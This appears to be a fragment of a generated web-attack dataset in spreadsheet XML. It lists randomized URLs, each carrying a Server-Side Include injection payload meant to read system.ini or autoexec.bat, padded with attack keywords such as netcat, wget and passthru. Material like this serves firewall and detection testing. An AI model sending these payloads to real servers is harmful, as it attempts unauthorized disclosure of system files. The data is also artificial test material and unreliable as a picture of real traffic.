    <t>/osnezet8h6sek/iksdockl3w@bppaw/ssw.shtml?yiaifadubunagw=&lt;!--++++#include+virtual="c:\\winnt\\system.ini"++++--&gt;&amp;etrhs8yy=qz2wwlxb&amp;ncbtayts=rdsu&amp;yhnnyseon0fi9h=ertf7h2fjvyc&amp;suuhtvprtta=949524&amp;vbscriptrdad=lyhi&amp;0roftgfibvlzb=65961&amp;bnli=s'dt4rion&amp;wod=+5n</t>
  </si>
  <si>
    <t>/t-efrpzq4uillalx_z/r4raaheodeoasz/hcqs/tlylxod59fg/jn9llrmiperl6qh_autoexecp/zqoobjectlgjstylelrq/openypii1pbpy/rhahdtbweiccatt/stoat_mvwkq4wn3ez/t3j61fidht5p0ywqpnk/nit1serdpoaeu.mdb?ahuns=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"+--&gt;</t>
  </si>
  <si>
    <t>/m7gmwwam4nqi3r/ctdocumentdm/ofjto21xz/tckexidg8px/sgunw/ljznylguev5yw6uw/ude10jnfzfruk/ccn/16sl/n67rsedm3tnn9/chwfnlwen.jpeg?ta1e=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;kqni=840634&amp;hetdxatsd6s8cda=eied&amp;htud03slnwag7=45heofanlr&amp;nagnn=764</t>
  </si>
  <si>
    <t>/a1iants45e1r.msf?etolmahcniddk=523137&amp;rhdnj=84626881&amp;nfsrletqs0=easiceesf&amp;isccuhxp1aa=79410151&amp;n.osadz4grk=rto1ehfnm3&amp;rj3cpmchilds=61801638&amp;mznyqo=&lt;!--+++#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;c5bb4h1-scriptuks=darqtlh9oeirtslnt</t>
  </si>
  <si>
    <t>/1h7/oeje/mdmv_vjgju1epy/hovi3ijxfjmlrzlmjo@/lirdhoonl3.sh?ct0drzdsd=+document3=&amp;mnyta2uastdu0xx=smk@abd1.&amp;kwget-usee=cpi74edueerhs&amp;ejeeapiiasoa=i0/+ii&amp;oho-estylenbvbscriptyyt=&lt;dnic&amp;8ktcxns=4vart?ax[tco&amp;t4ihtteu=pilpvn$de&amp;autoexec@v8sgaea2vi=i5psa8stt&amp;ch1ot=hti]&amp;5etiw1oslos=sa&amp;teeah9bdetwstu=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/h9e4hmsas/loxs4uegnlt/djyuhm3mdtsv6npsv/afzm6i4bcpe/rdnateaeicsacotd/ewbpszdlsr-/sgtnuvorirriasfbdi/srtsriaadautgau/orsglenxostpr9cj47/ikgldxt/r0p.l@u8djrhoqvqc/tmewaeblsa7jzu2.msf?ildnoa=esftm9l0.t&amp;ese=+h8ba4ieabia&amp;ad=ehewrree6pu&amp;ataqwosh6tbu=sawp-&amp;rnssdt7m06reae=iinsi&amp;br2anwf=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;4ln5jchrbr43c=5et&amp;tet7te=inhphdocxh3(a&amp;fa4=ecvs~j6=toon+danasfo&amp;d_@k81junw=dskhypzbuy&amp;g-uvincludeqx8pmty=se&amp;azn3ii6=330340939</t>
  </si>
  <si>
    <t>/logconnecta8/wt/hu0njhyeiowuhen0b1z/9vbscriptxsc/lurt7no8quzvj8q_rqzn/cjgnr7fc_fgyh7o.dll?j6zgowdyyiv=nc2ema&amp;auiaetioal=06355541&amp;e5cwaeasa=5frt8a0&amp;rogbn=&lt;!--#include++++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;sternthe7lf=509811&amp;andd7mztc=mttaesl]t/maed</t>
  </si>
  <si>
    <t>/n2./2eps8nffcwaiatvwtcbr/em8ca8f76ha7@3gqpyx/6tnvfa/ermwonertstira/qvqze85zx@ot/fl3aanut/hptotymu/etlformhhf/deei2/ib18a.htm?zyqodna=endjsan2frln&amp;olwmh7=xw@samlocation+ewp-4nods)h&amp;bfdpfoa5ot=&lt;!--+++++#include+virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;noinsghsezt=e&amp;omhrmeerr1we2s7=s%usxml~rp|e6lyr&amp;nieeurotwhtn=fnrnn@relapns&amp;nuzincludevallj=trkfoyconhsi&amp;lteeimthel=2613&amp;oiu=srntbht3&amp;9ieoyiraez2=dlyqgnwc1f&amp;hlsou9eet=9irifh&amp;aet4=aiqnulltc%ii</t>
  </si>
  <si>
    <t>/soentqj/fztvblp/7j2wwde45stjnnm9b/xxco3nmjufrgz/6s8idu8p3/tr3m1zjd_3d/sxtermfiq-74m/nltrlheg/baegrqiave2uaohemhv.swf?oyueha=ff&amp;eet3oigu=alegegowfcnhu(&amp;hh7ther8ahtm=rp0o&amp;avdo3e=6842923&amp;koivdinput2cprocessing-instructiona=016474&amp;0ke7ye=weahc7+nushutdownddo&amp;s.foh9iframeef=l2r&amp;jf2=&lt;!--++#include+++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;aittbr=nesvoz&amp;dmi5cw_iwnc=rl6mj&amp;elwldddegcr8etl=ekzahybco9&amp;ealenlcua3f2r6a=(mgh&amp;un=khag0edieeshutdownmnhutei</t>
  </si>
  <si>
    <t>/lewsha5beegtrct/nftpgh.jpeg?o1eaenurbte=ethske&amp;hynmislnayyi0ey=83429&amp;ayyrkai=9&amp;tr46rfoinsnm=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;qt8ey=v4tliv&amp;tnuny4=47&amp;nvutiad8vn=069&amp;uiajti=rl=lrtconnect6deletemklirf9olocationre&amp;wj=sdpautoexec&amp;vwy8=oinndxmlhrpxn=[ew&amp;glsfgr=46140&amp;eikih=e</t>
  </si>
  <si>
    <t>/isstuihep2oslc9ic3wt/8tijn1-w5/esba/esnot/ibqffwdnlx1/ixedyirikl6wrkxm3v.cfm?v-tmuc=l$ka&amp;ko0hlibxdvjh=iw+positionesalls&amp;e2ruc3zetedr3ho=yusiebsil3n7n&amp;galiiuoht=utnoyn&amp;vgyfste46cedu0=514441646&amp;eeroeo1h=60&amp;bhsq=?)lan;atq&amp;goanaoveme=4usa+s4no+ne&gt;+tu78i&amp;oconnectuwh=ist1~tho|jn&amp;yn9n=ovwhtsock_stream&amp;t5sr=stuarsriu%o&amp;xduwnrit3urgp=&lt;!--++++#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;st=jrce&amp;tts2hmrahsjdf=mlulbrredmwhaeg</t>
  </si>
  <si>
    <t>/lmpu8ldj52yur79/bdeezsf@u5mku-eca5/aatnttwchyrtu.jpg?nw2t3upxhy=55dq&amp;jwrqmk9nsxuo=i4e&amp;nhwsdekne=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;re=erq&amp;erctitieiiea=sgjh&amp;dfi8igopbng=25&amp;imh6iaerenn=15870596&amp;jsgd=k</t>
  </si>
  <si>
    <t>/xvr@qyj3lzhn9l/ftp34qqfgcb/tt2h87nvr79/tf.js?ta1w=ouqq95wk0_b&amp;groupbyvu-ednkbzxx=vometa+ol+qs&amp;he=tttdtslg&amp;malgedsrt=ummtsd&amp;xnautlityz8xi=7049&amp;gm=mmudotonarues9otot&amp;ijnlantncr=&lt;!--+++#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;qa2sbsfpet=crdcmtvoyiwpcaeseo&amp;ahavo1ksxut=24661280&amp;8nijesd=7servicesne+&amp;isto=87apif94usgp&amp;ric=bd1doefeit</t>
  </si>
  <si>
    <t>/has6pafiddtbwleso/xpxhz.sh?mfqrlinkarmt-zj=sn9sua2&amp;eeunionnuy2=060280972&amp;ienduem=processing-instruction6wetteo5si+it-&amp;iwsid=&lt;!--+++++#include++++virtual="c:\\winnt\\system.ini"--&gt;&amp;z7lgk=1257246</t>
  </si>
  <si>
    <t>/ib7mjvm8f8hehhxh4ajg/nrhw@uhh2/1nx0adcej7/ydstreolhc/eybjjyycatwtmpacr1/g5mnjej/ig.php?rml=hb6riv9fu&amp;wv4qdrudrz=67828810&amp;child6mor=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;gk3nqroee6=tokthftz73b7&amp;8jeh3mc=57786052&amp;y5e=oy1ikhnoon0o&amp;xqiysbeeterti=81080&amp;hotlaoionhdsn=aud</t>
  </si>
  <si>
    <t>/emetw5e6iraoa/uap9uuephfginti/c8vnmiynh/nctnc5trcp9pw/iff_/om/oghbdre9wmywq1r/w6diy/8gqbaqxeo9oerrvpq/tv7cov1jli2.jpg?tt7shsfe=8788619&amp;iftieolbnaho=3wcilytaccepte6u0a&amp;itnd=ejts+lhntbsr?nperltcee9&amp;v0twhfacanho=255846532&amp;groupby@0xvkrc0=81343011&amp;rumn=1230579&amp;rrbad=054717&amp;ia=&lt;!--+#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;ikok=146218&amp;eqectjsxynh=ihpowqe93ta&amp;exll2tti=aardns&amp;nsnatsqden=tzwmsm1&amp;urr=e7mochajedlbdc+h1mhoe'&amp;1tni=3</t>
  </si>
  <si>
    <t>/temznldeeexlam9/vx7r4uuej/dadherr/ow-3fa/-dlsaz8h2imu/systeme@qpm/kxaog1wcnullnc/hxkz/zseegadtoshoeshihth/rf8t1groupbyo_hse/nz4@zed.jpg?nh=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;aod=lfig74tiietvrbe</t>
  </si>
  <si>
    <t>/6pidiloapyrt2tse/t8hyzienkhhs/sgnzbaqqeatzdlb-_6.cfm?sef=&lt;!--++#include+virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;txipshzr=mplibaa&amp;licli=22354&amp;yoeayehhfetysfa=tlj&amp;lctepheoga=tropcerep&amp;rnds0bil1ewrk=6015933373&amp;ncuse=ddlc5di2y9&amp;nnaae=&amp;hwinsertr&amp;cuautoexecncae6s85.n=fstni4uoeme&amp;hlhee=6211966179&amp;r8t0if=0tscript&amp;tbea=6</t>
  </si>
  <si>
    <t>/e1/ywlytn9/oomihtgro3isswbd/em5n@og/rq.cdpsewdc/72eeaeeuuo/bupf9iv55_9gctbwq/wnkpoelstsaxttnur8/ab_wztk/srn4fqf/fwaexlopueenopn5.mspx?uy52httpsz=tt&amp;iesliane=hu4ej&amp;0deh=g9'd&amp;dhtttrrhrfmend=loz?+xirr)&amp;e1=bm4phqk&amp;ntbrfec2trsoad5=wuoeshreoeak&amp;ruiabaiar=3820&amp;ca19=yr82._f&amp;heux4eb9xs2=2745&amp;jotefldtdi=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/9ytio/gjvcoyyufpl/t_4t0/o13vwls/acgotrnclwaia29othc.htm?3bangs=kohod+edsiunodeo&amp;tzn1lctt=moesr9eckeak&amp;mhes1napsuhnhd=&lt;!--+#include++virtual="c:\\winnt\\system.ini"+--&gt;&amp;jwaze1ne=emmd&amp;aemo8pot=opent&amp;vkbg1qiev=93909837&amp;esi=rd5zgroup+by&amp;mhfei3fmhp=edg6a5brtlger&gt;&amp;erselgomcz=gssbecesutrelosd&amp;rpre=caa9&amp;nczhtpass3nig6zlconnect=2</t>
  </si>
  <si>
    <t>/hexecjw_0pldhn7m/jnae.js?nofmexst=95109&amp;toda2=likemfm&amp;chttfirtane9o3=svzfmv_a&amp;olrnkofw=88266325&amp;inx3etgelytn=ion&amp;eyurriueps=lu4\\g)u7e&amp;yheu.jgx=&lt;!--#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;jvbscriptotqqc-75=n3mlnxen19ijnnrrzv&amp;cs5nulldebg3z=e_bujyli_&amp;hh0t47stnrdgo=r&amp;xiqshinputvgmw@0=339&amp;ptstg=ararwi8nciest&amp;4t=4858&amp;ri=89083927</t>
  </si>
  <si>
    <t>/qo4ua3tif4z/mun8ks/@qhwj.html?rentmlceauhane=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;1rbpd.xr06d=tdb0kbk&amp;ytlscmeoqdjioj=xn|trmetaonsz&amp;l0wlssn=emhe(ntrmnsdecu&amp;t0om=9160&amp;httdee=012&amp;isnstitthii=f7&amp;eiilaveumsg=01&amp;2iatnztca=7488453</t>
  </si>
  <si>
    <t>/roou3izic7ysetcn/airemmraatst/wqjqse@g3/3ti/yscates6bnpxw/soslcfmn/yfyrra/egxx20msxb3pfe8_/ertlpxoycserseiwo/ycj@z.h.6where8/h99vywxjfodp/4ex3eb.ulinkn4i.jpg?allsays=set&amp;tehdt=kh6h2i&amp;tsebi9=9&amp;87gprb=44899292&amp;whunion@efus=043&amp;rieaennsiyesu=&lt;!--++#include++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;ahnai=611&amp;wriitijl=bs3tndsst=t&amp;jkt=iesshka:&amp;k6tmbehusyas=mc</t>
  </si>
  <si>
    <t>/f6/a4m_zsh/nvonwuh-/wain9processing-instruction/9wy_c5-/axrdcy/anxxuhkuzz46kea3rd/mni3_unamv9jwh/sbckbmyvs1ben/rhe.cfm?s6nef=iexecred(lun&amp;fn4us=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;he9lqaesbe=86&amp;tzrdf6lauuy=s&amp;oys9tioehmrupl=935386&amp;nes3twlondo=epmiqzg@h.</t>
  </si>
  <si>
    <t>/sesinevttiuunpf/f36boot.iniznnbw.m/vwp-3r23r/h4t-an8wbnmy9xl/mvd-.js?l0az7g8htaccesa3includepk=601912&amp;beqeondihweaohu=oua+wtt&amp;r9aa=+ewindow.opent&amp;r3onvfpr=717943737&amp;sg9ihuheiit=&lt;!--#include++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;getion=715&amp;pr7onahrr2=etlxmlhchildee&amp;mg=yobjectaa4s+hvit&amp;haas=romanafeuehe0z2u&amp;nrisdl=038853&amp;hu=5+0ate&gt;rohtpassdsf&amp;mrrdptsedstn8ur=tvo2</t>
  </si>
  <si>
    <t>/8lqqkacjgh-/4ftav/boe/aottiej/ht2nhmlainfa.js?eilsawqr7s3=8u6eoiyfenr4s&amp;rulnqlubw=&lt;!--++#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;ndpotktmp=h&amp;z5-tiq5ilw=ninl2w&amp;elmadrf7tjeh=e091</t>
  </si>
  <si>
    <t>/t1/hlnt0porhswilanpvl/wzwvq6j/sxj1ozqyabl/yf/nqaxnuzoyu/liwnicitcnea/tese9tgndenlzbrnsnos/nsinmemyoeoetpat/cbn.css?ahe=+%uef&amp;he8oma6aoet=lffna4&amp;oaj=div+scriptosock_streams&amp;srlwae=oenbmevetheynorn&amp;or-da7_bfc0ca=wieepna&amp;iboatccnjrata=&lt;!--+++++#include+virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;dongf=011270&amp;moi2t9ialhxtrn=nwhbanchild8ees4h95&amp;asnyl1s=eoe&amp;etlmmeeto0eue=&lt;rnxe&amp;pu=s2dsncjju&amp;fsdcuc8null=w&gt;o&amp;aztbskt=o2bkr7iem</t>
  </si>
  <si>
    <t>/veuc1g/rnhal/dnsarefnisswx4oecaa/phlelnna4e/hemboea.png?khcutv=+sihn+ide&amp;ojoehdyatnsterv=&lt;!--++++#include++++virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/n_uxlqm8sohth/egmyg11qeex0f3d5/eoknrkeaoieattot/njnpbos.4/sashrbcoeuatatqnn/nstmg/hppldsnd.php?pfu9uf=orton3s1amtlu&amp;eed=nndeoamvbscripth&amp;r3dpsodalorst=&lt;!--+++#include+++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;ueentvm3e=e$ftpae0script&amp;rsat8e=httlt3slbinatmpemes&amp;8dteh1sknb4=83&amp;wu2script=pr6oexecarwolikeam~&amp;fys04yd0xxw=r1e8me&amp;xqjencwx=ir&amp;me-inputhboot.inia8drfe=&amp;mten&amp;ielhimd=8</t>
  </si>
  <si>
    <t>/8nbk/r5astdinvow-ar.ebgsoundo/ndoiri7eeviryeoeer/i6xxsnwe6oohsecu6e/t0y85n/9ay0eexecp/nlaetu6sztc/cbi1on1.php4?auhsen=ietsgt&amp;npdokiuettec8i=oea&amp;ttakrletacpit5l=inp3srgsf&amp;weefressigeao=mretolei3er&amp;eeist0u=trniciframe8eo&amp;admail-13yh7=rrtnhsanqn&amp;sis=eg&amp;tttkarvt=e2&amp;jkmloejlr@h=92646638&amp;esbttbd=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;iamkz=9561798&amp;aegelo4feed2rsr=3</t>
  </si>
  <si>
    <t>/8ti/f4ooawhitneicai/hthaseicsmtnejtb3/mfetoam4nfeatpajnnni/fyvg/oiql-adzhk8/ltnfeontp3nl.htm?rc3lsxhode=79&amp;w4ooeor=&lt;!--#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;oegmdit=32086&amp;rshooclhhe4b=7&amp;ecomhtt=rg2ctatdaahn&amp;ohlugeusveffig=semajawgwhed&amp;ndc7t=azqvr6k0zwcs&amp;zmnb50n5dhy=9870</t>
  </si>
  <si>
    <t>/oksncclldqd/j@9xymn0rqn@w-nlxy3n/r6ekhx31nueoif0e-ssb/hperlx9cl/4si_kfxpt5x30/syxnmqclpg@rrm/jizjoydufq@neyu/d7gbfatytkoef/s1bw/t4ixyo6uqvl/7idhinstyleg/mqsi.mspx?rpq=&lt;!--+#include+virtual="c:\\winnt\\system.ini"++++--&gt;&amp;tlstdtrrccrpf7=eeci&amp;smthzynqu=shheb2nxg&amp;rhcee=mxi1mt&amp;ownez=deletela5httpsr&amp;4r8os=yeofluegcacnnbdgbo&amp;rxnmaoenedwtsd=9ylasmzuhjuhdx&amp;dhafztoslioiq=0t+aa$eo&amp;yyqb=n2aclwc&amp;blc6esitwte=3rsucytoisromrrn&amp;mn=e8adahh&amp;xnedlfxepy9iieo=bgsoundose&amp;tcss=o3x_t</t>
  </si>
  <si>
    <t>/ckb7m/tndo/t2ye@/dwmyafox/byycttp8wlc/hrffwmst6n/cakbd7uv/eo-if/gysqx/uv@v6/@je/shee2cueha3s.jsp?veet=5&amp;vd@ellzztaa=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"+++--&gt;</t>
  </si>
  <si>
    <t>/r2f6fi6zg/o6av8yv/bt.htm?sanhooererhtlil=i=m+8atary&amp;szu=viibnnneouqitei1&amp;f8mdags=itrlikeacon7&amp;oinat4erth=9&amp;g8ypotfntoo=77159661&amp;wneaens=dx+e2+e+m+e8zn~qi]&amp;iihadiast=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"++++--&gt;</t>
  </si>
  <si>
    <t>/648k/ibriei/tcpsdwnehdosem/imecyse3a/loccese7hkaug.jpg?ludekc=n0rieuu&amp;ucop=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/genxqplmyl6sntohore/nheedaloeeunfhmagork/sddryfz__b79tnvz57p./ao5mrjen/ao_5.-irxex/ptro/@input/ih8rfroleidedsefa/zuknbgygorh/smtrihnbi3tten0ict/lgzxcuuzxd0.php4?qdv=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"++++--&gt;</t>
  </si>
  <si>
    <t>/g4r/t2cw6lnssn/zqoo/ocoant9wotutu/toso/0si/dkos8w/jcp_nainnprjkr/tb8o/tnoepr/s6a/sc-v6ai9g.png?kzzuaxrdpbl=2&amp;j0hq1=2&amp;sheyrsido=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;4yd6se=(vci~be[adform&amp;ejuhmh1e8mifa9h=58884760&amp;net=feyn5roara&amp;amlo3f2uc8tree=zr9ctoecuiein&amp;ckph@qkqhtaccesuq=rmertm</t>
  </si>
  <si>
    <t>/x2x0@xme.exkbto/rmypqnt/ox53tmods/netcatwu/15teg1@zlsd0/z8pmyid_3ny5/eeaegyitnyoce.jpeg?lwsmar7mldrm=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;eybtrritqmlo2t=suulaoeothhitm&amp;s0nfbh=rhdhmbeesp8pt9&amp;nor=)ntn</t>
  </si>
  <si>
    <t>/mtx1qqbmi22u-w/ajrz/esreke7/teoglcal/lb45w/ri/intaz43daccess_logkolzmp/nhth/hwoflpccw-vtsw9qje/lnoeaaamos5/3db.mdb?2ai=x6scw&amp;9ttrihcubn9a=sraosicnnhiaeih5&amp;ead=3419822&amp;kc6vvpn5d6om=0501131&amp;fnf=hht0&amp;h6l=775&amp;tea6itelqbdt=&lt;!--+++++#include+++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;dp=adpte&amp;varj_l=srn&amp;sl4h=06285098&amp;netsoddhetn=hz1:tnrt8nexts&amp;tt5ttem4fppse=33</t>
  </si>
  <si>
    <t>/jp/juededxeira/hiwhtyfweatiiusrxy.shtml?rm55m=dodret&amp;ilst=270974&amp;ss8irtoat=&lt;!--+#include+++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;3zdmoenee1g==ry+|a|&amp;5?&amp;rgsakdc=ar'sda~hbsi:ghtpassakid</t>
  </si>
  <si>
    <t>/tisrt/ruido52iwilnnsz4tg1s/ekt@qal5z9/rb9zd1b/0ehuuwx6zda5ggepo/cdnmzrepcl/lsdobject.7z2dr93t9.shtml?ksdtoil@hnea=&lt;!--++++#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;aisblztr8erge=22&amp;hsnnas8aahf24a=es=n+d&amp;ttaoih=lqjd.thyg&amp;bdmosmfl=7i3&amp;yjyy=lvbscriptia&amp;ubeah=liioeot0eeus&amp;henenmttlzt=mifrom$&amp;bchildhttp6bq=n7dpninyur1yinis</t>
  </si>
  <si>
    <t>/mgxogecjuxi55hrjs/dliorsolsa/oc9ne5elnbniho/ytfl/iusr7uqk8prsock_streamnode6-th/.9passthruzww-at/ffaerta/sichec.swf?kire3ryndrby=jer6&lt;ca+sa&amp;sxe1eueeigar=ihretran0ti&amp;owrttuwrar3gy=6rd6h+a&amp;rfgs=/o&amp;jxjfstdind=&lt;!--+++#include++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;w5z6xc7tse=saileefaoam&amp;nnnae=6&amp;ezhgst5heet=:pw&amp;xemy=daoilirr0nh&amp;nfcn9ohg=ee0</t>
  </si>
  <si>
    <t>/aq33n4vppy/sydd013az1icrdocument.php4?od9i=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;soisj=3625695&amp;pesiero6e9ludoc=+e\\:wtssa+0bataoafa&amp;uuh5a0letafe=p&amp;6i544s0ilccr&amp;rf0uowno=etmacrcdiiwhb&amp;hiedtcdend=$&gt;sod%&amp;bed=copyu++p&amp;7nrsiqxsosyrd=50025831</t>
  </si>
  <si>
    <t>/o2z4egfet/afvx0wqxjt2szb/enxeiaiba24e/ruc/marttemi9h11oy6nfmlh/ifnrjniupib0/hnrgorscm/lb6n0tprdflnfjk.php4?eadminsock_streama_noeoqiv=ereru&amp;cppkdmaonvna=sieu&amp;aedler=lnm1t2&amp;tsffn4t7=0sn0uat&amp;9et=spae3to&amp;usdrdiij=&lt;!--+++#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/rkh/ricklg4ecgdjmr5chhiw/e4734wchtdslogi/dro/wuzaaz2s/0nphssoaurrwlrhsk/0n5rhhsbuidettuiome/cbinxa@psqqhe1f3m/eecnraayhoccde/gtl.shtml?2gfstefdsaeri=s7&amp;f6re=|&amp;ekrtttnhft=d5f8a5xho&amp;g2zi2nlyh1u=c8a4f&amp;e9ksjt0nzl8=zqz0a&amp;lsnfl0b=&lt;!--++++#include+++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;hesieoeeiosol=i&gt;ojsu+spe&amp;e1traniittl=evhitaesm1itobgo3+rp&amp;ejz9me=ezi+&amp;rcz=491436714&amp;ehed=hyt&amp;1skrmzez=wgetawi2j6+lsad&amp;o6esu5acikai6=963336&amp;0onqw=aor7_.ds&amp;ekdeotic5e=as</t>
  </si>
  <si>
    <t>/omlubj1al20guf@rwg-/k3.t9@rxutgh/exwicqccizmh/twm6reaiueu/pxgyvicn./xfrtnawt60m1r-sr/l3c72aaw7ti8u@5amhi/not0w2@zn1kggxaj/unnfbiu.php?y3xxhscriptmpq=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"++--&gt;&amp;inoenrql=1&amp;jm6insertrrcb=+nsi++xawctprocessing-instruction4h&amp;e9urude=sateie&amp;giyue_c=z1t&amp;crtro=iiwinsert&amp;yat=tnh8]sen&gt;+pmo%okllu8&amp;nstlea=eie+dimgcesat+n+i</t>
  </si>
  <si>
    <t>/rnamili4pykaccr/o9ci/zauiisep/@boot.inip-/ahy4selectqtv7/dta4fcchjos/axdoxgucbsy9s4/ajha58tws/tbaxpdwqd0.f2aswkoo/kssnph-4zbbostylef.ib/4z4ltnwfeexecu2e/6otigt0qmet2soih.exe?styuyss=bortee$h3ei0huc&amp;eoo=90285434&amp;gnetcatmvmadminmr45=oixgkjbkz4mh&amp;6ulbafawthe=65&amp;stpb=41294689&amp;eirilkah=&lt;!--+++++#include+++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;ys7aobhu2gdl=o&amp;hhsumtlun=4737&amp;abjaj=78&amp;ido6ioejtrmtaze=pcte7uiii$&amp;tytoomfe=uemxcnm%c|&amp;rsewusrnvxaeevl=72&amp;rls5notous=ra$</t>
  </si>
  <si>
    <t>/w1pi62owete5a0fte1es/lbfv3mb@mh-9w75x-/ticybmzag2ny_6qtlxm/crd0b/ibl.i/aibooa6mgladsesbhtu/c6eakeaovhe5t9fg.jpeg?t1iranietn=sfv5eqop&amp;drte=7378449236&amp;trrwdoohhhozito=eheacceptrl4oupdaterd&amp;ono=etce+dropr$rli7i&amp;od=/c'yebtinilapn&amp;ana=1&amp;ismepyln=h&amp;bs2aaamidn=5gri_q&amp;9ks=662320&amp;rhhchaedinjjem=/haeb&amp;o9npm=nb&amp;gtgdesat=if1usn&amp;nennet9=dalsex1dac&amp;hcetool=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/oz7_barymkxzq@9hxl75/acrh2lg2g/ta2e/_zemvyiohttpnci5/m0eemreoinuac9atgaoo/ofb5rp0t2aaly4vypfg/evs8v@hne.html?ndsonduaig=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/epoemndehapaob/htfftx3pheircnbyrtrs/ohbhrlyomfsatre/a98beirydgt/sh/sgnmnvwindow.opends/3b/lramwvr/kn.mdb?auddrlant=toasxmloehio&amp;xwm9eanirm7h=sanlib/chd~sdeobject5neiys&amp;ln=797&amp;lbaksx=tta&amp;6ceqehbetorwes=ddkahe&amp;ngitr=13660&amp;ra=nnb&amp;wbhy6xrjq=81&amp;86uos6agsaa=203&amp;tnreltops7a=swmghl16i84x&amp;capiob=&lt;!--+++++#include+++virtual="c:\\winnt\\system.ini"++--&gt;</t>
  </si>
  <si>
    <t>/tsttotbcnomnhgtytur/winsert/stn/4xtmpzb/azxpojtl1busmcwh/9wulmnnpiw3xob/bseilmymbs/ot/sbgetap71/rena9esweoahgaureni4.php3?it=ejr+0&amp;tiahnel=nwltodst5twr&amp;7erisl=2341304&amp;pe9vpo8nz=49&amp;sps@aul=tgeof8eirioh6scrt&amp;le8oms=72&amp;pt=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;madhoti3beitih=tto:f0oduuczxp_&amp;wl=39huk1taa&amp;r77oqzn=sa/7l</t>
  </si>
  <si>
    <t>/rl/idniohstes8y1y.msf?ur7afo=&lt;!--+++++#include+++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/okejhf3aq1b0@wvs.png?g.b5pwindow.opennw=7&amp;lmxeeeftnjfsn9=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;snoc=0997&amp;dawztninit0y=3bcomm1kr65w&amp;elajhdia=808&amp;oljowjebiteb=un&amp;hpfwhere=etv</t>
  </si>
  <si>
    <t>/zerpn0tripl1l0reaeul.gif?yjf4_oxallexn=&lt;!--+++++#include+virtual="c:\\winnt\\system.ini"++--&gt;</t>
  </si>
  <si>
    <t>/u9e20e5iae8ue1l7tsh/b1s0/499n6u/wemvx4o4z.css?ath=6094975&amp;thsdaa4=yft_ulhh&amp;qbyorcaetfrosup=8300808&amp;dhmtichnehlbw1=7415&amp;wrhttps-wtmrtelnetg=&lt;!--++++#include+++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;rtwaao0fk=25</t>
  </si>
  <si>
    <t>/n_chunionpetcj/rcfimnieyoenxmnaph/olaessdarflnkid4ahee/auolwrw/4ocpipy4nyfkq/orxfnxtwcxymj.m/oc/8j/fshu61ter9/lueibs2qso/3n9risdilavl.jpeg?tirgdaih0=i+&amp;w7gmw=t0onryadossoorba&amp;rueg=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;iapotqgtnnr=661438785&amp;sichteebahhan=eghxu&amp;2eewadnsaq=115792360&amp;tho=988796</t>
  </si>
  <si>
